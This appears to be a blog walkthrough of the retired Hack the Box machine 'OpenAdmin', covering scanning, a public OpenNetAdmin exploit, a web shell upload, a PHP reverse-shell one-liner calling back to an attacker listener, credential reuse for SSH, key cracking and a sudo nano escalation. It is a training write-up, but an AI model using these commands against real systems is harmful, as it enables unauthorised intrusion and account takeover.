Hack the Box – OpenAdmin Walkthrough

Today, we’re going to solve another CTF machine OpenAdmin. It is now a retired box and can be accessible to VIP members.


  • Target OS : Linux
  • Services : SSH, HTTP
  • IP Address :
  • Difficulty : Easy


  • Getting user
  • Getting root


As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA

Enumerating Port 80

By running gobuster we found /music and /artwork directory with 301 status code.

gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u -s '200,204,301,302,307,403,500' -e | tee '/root/htb/'

Enumerating Music Directory

If we browse URL

If we click on login there’s OpenNetAdmin installed.

Let’s enumerate OpenNetAdmin and Google what really it is?


There’s an OpenNetAdmin installed


Since our target version of OpenNetAdmin is 18.1.1 we got two exploits for it.

Let’s searchsploit -m exploits/php/webapps/47691.sh.

I tried to run exploit it didn’t work for some reason.

I had to dos2unix 4691.sh


And we got low privilege shell.

By going through ona config file we found a database creds.



        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',


Let’s try getting a proper shell first.

I tired every reverse shell such as Perl, Python, and bash none of them worked for me.

I did wget p0wny-shell and uploaded it and got a reverse shell through that way.

php -r '$sock=fsockopen("",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

And got a reverse shell instant.


nc ls

Seems like we don’t have permission to both of the directories.

If you remember we had SQL Database let’s dump it.

We don’t have access to SQL or neither SQLDump is installed.

There’s a reused password for jimmy.

lets SSH to jimmy with SQL creds which we found.

ssh jimmy@ 

After doing some enumeration and looking for something interesting.

We got!

If you take a look at main.php we’ll see it’s our way to get joanna ssh private key. But we don’t know where it’s hosted let’s take a look at apache config.


If you take a look at internal.conf and we’ll see it’s running on port 52846. Let’s make sure if that port is opened for us.

Seems like it’s only opened for the local network but luckily we’re already on the network.

curl localhost:52846/main.php

And we got joanna private ssh key.

Let’s crack it using GitHub - quarantin/rsakey-cracker: Tool to brute-force the passphrase of a RSA private key in PEM format.

And we got the password!


let’s do SSH login as joanna.

ssh -i key joanna@ - bloodninjas

Now, that we’re login as joanna let’s do some enumeration.


Privilege Escalation

If we do sudo -l

joanna can sudo run nano to read /opt/priv without password

input to sudo /bin/nano /opt/priv enter nano editor


It is simple and easy to understand thank you.